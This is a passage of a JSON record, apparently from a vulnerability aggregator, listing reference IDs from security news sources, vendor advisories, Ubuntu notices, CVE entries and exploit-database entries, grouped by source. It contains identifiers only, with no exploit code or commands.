"THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C4662EB2B72616C90A201601B18E392", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E1A424ADE6EAAA732FBE0027DD6F97F", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:75D7888FBC8994FA98D2CC1C4AB75EAF", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:7719EB430C620858B2504EA847A9A096", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:794EAB73A376A35B810DFA241137B6D2", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7B46C96564251E67650F604C0B32BC46", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:849E78B2F5C0D699337829FD6D6F8AE4", "THREATPOST:84E8993BD84BB1AAEE4273958FF69EDF", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:862191C4B9FAB2D3FF3980991801A529", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:86859A3C9EC793C6A0592ED93308A9DD", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:87BEB3651A26414841F6C10CC8797A19", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:9928E4032CF09647D7486B6AB9996982", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9982AC17285494A6CE329FC5C04DD84A", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9CD19A6A1B939482B336348DA5D2F47C", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A1DDB45DCB57F828DB4CF6A503E200DF", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A2FE619CD27EBEC2F6B0C62ED026F02C", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A617AB8E3147511D6E87F9782597BB64", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:A9DA8692E05321571BBC81C64842178F", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:ACF4961C0305F2447E96F09C6C460079", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B32C3B660376692DB4A20533491ED3C4", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5AADAB1C60C6F2AFCCBC532326ED087", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:B8EE84454BCC4614F524D8A4901907C3", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BA5C6FF88B9E93BE3E67B91264AD4549", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BBF9233468A677A95C5E9D149089804E", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E", "THREATPOST:C16A03D304D0ADC9CD38D3AC7B0F079A", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC15A784882157020D893E0B44732332", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D28C33F2DE823C49041D452AE3C37607", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DB438BDD32A19C608E74D09992D53881", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DBB88263397DE4DA6604A2D6517DC194", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E35A2DF8A317D2783A1DAA9CC68BC463", "THREATPOST:E415CA5BCD7AC520A44AB5246664528A", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E44D0A1C3C7C76586EBC905270FFAC34", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EA8274414AC42B3EF48CA27D45659736", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF84B41801B386E972FE3C31F82F66EF", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F12913D59D338ABFA8959ABE0730DC2B", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F6AE4A5AF20D9E9C8BE6663E8FC80848", "THREATPOST:F6D26AE5EBA39346A2B00CE4C6470A88", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FF75AF79B23F8B0D0CF546FC055B7911", "THREATPOST:FF8B5ACCCE8A1CE6B8A830B1D3E9E316", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trellix", "idList": ["TRELLIX:21227249912602DD6E11D3B19898A7FF", "TRELLIX:357BDB16F9C97C350D8CFF381DE2C04E", "TRELLIX:39F5630F37B0A70500113404A73FE414", "TRELLIX:7B9C31B3E2F1A079101A700230D5A5C0", "TRELLIX:908157CFA8050AA23921170E873187E1", "TRELLIX:A55D5E405589804B0EB3A978F9C66068", "TRELLIX:B73136D0B1874E13EB839E42FB157903", "TRELLIX:D3CC9DD7452C6A1D346229DE526BBE46", "TRELLIX:D57FEAD5DBF6D915430C791AC26C10CC", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:0CB92F2EE8EC7EB60BEEAFE3A0B1926F", "TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-1373-1", "USN-1373-2", "USN-1505-1", "USN-1505-2", "USN-2362-1", "USN-4510-1", "USN-4510-2", "USN-4559-1", "USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-3571", "UB:CVE-2012-0507", "UB:CVE-2012-1723", "UB:CVE-2014-6271", "UB:CVE-2014-6277", "UB:CVE-2014-6278", "UB:CVE-2014-7169", "UB:CVE-2020-1472", "UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veeam", "idList": ["VEEAM:KB4254"]}, {"type": "veracode", "idList": ["VERACODE:11431", "VERACODE:11437", "VERACODE:13737", "VERACODE:13739", "VERACODE:13741", "VERACODE:13752", "VERACODE:27548", "VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "vmware", "idList": ["VMSA-2014-0010", "VMSA-2014-0010.13", "VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:107445D672F037011ADA9A0DA9FB8292", "WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdi", "idList": ["ZDI-18-540", "ZDI-18-591", "ZDI-18-592", "ZDI-21-819", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-21573", "1337DAY-ID-21575", "1337DAY-ID-22691", "1337DAY-ID-22692", "1337DAY-ID-22693", "1337DAY-ID-22696", "1337DAY-ID-22699", "1337DAY-ID-22701", "1337DAY-ID-22703", "1337DAY-ID-22713", "1337DAY-ID-22754", "1337DAY-ID-22807", "1337DAY-ID-22882", "1337DAY-ID-23442", 